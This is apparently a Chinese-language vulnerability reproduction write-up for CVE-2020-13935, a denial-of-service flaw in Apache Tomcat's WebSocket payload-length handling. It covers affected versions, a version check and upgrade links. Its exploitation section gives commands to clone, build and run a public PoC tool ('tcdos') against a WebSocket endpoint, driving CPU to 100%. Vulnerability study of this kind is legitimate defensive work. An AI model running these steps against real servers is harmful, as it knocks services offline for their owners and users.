CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现

CVE-2020-13935-Apache Tomcat拒绝服务漏洞

  • 1.漏洞描述
  • 2.影响版本
  • 3.漏洞排查
  • 4.漏洞利用
  • 5.漏洞修复

1.漏洞描述

7月16日, Apache基金会发布公告称,Tomcat中间件存在两个拒绝服务漏洞(CVE-2020-13934/13935)。据了解,上述漏洞是Tomcat中间件存在设计缺陷所导致:一是当请求数过多时会发生内存不足异常(OutOfMemoryException),从而导致拒绝服务;二是WebSocket中对载荷长度的验证存在缺陷,无效的载荷长度可能会触发无限循环,从而导致拒绝服务。目前Apache Tomcat官方已发布新版本修复该漏洞。
漏洞等级:严重

2.影响版本

Apache Tomcat 10.0.0-M1-10.0.0-M6
Apache Tomcat 9.0.0.M1-9.0.36
Apache Tomcat 8.5.0-8.5.56
Apache Tomcat 7.0.27-7.0.104

3.漏洞排查

进入tomcat安装目录的bin目录,输入命令version.bat(Linux系统下输入./version.sh)后,可查看当前的软件版本号。
CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现_第1张图片

4.漏洞利用

POC下载地址:https://github.com/RedTeamPentesting/CVE-2020-13935
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]

编译命令:
go env -w GOPROXY=https://goproxy.cn
在这里插入图片描述
CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现_第2张图片
攻击服务器:在这里插入图片描述

服务器cpu利用率瞬间达到100%:
CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现_第3张图片

5.漏洞修复

下载官方升级包进行升级:
Apache Tomcat 10.0.0-M7: https://tomcat.apache.org/download-10.cgi
Apache Tomcat 9.0.37: https://tomcat.apache.org/download-90.cgi
Apache Tomcat 8.5.57: https://tomcat.apache.org/download-80.cgi
Apache Tomcat 7.0.105: https://tomcat.apache.org/download-70.cgi

你可能感兴趣的:(漏洞)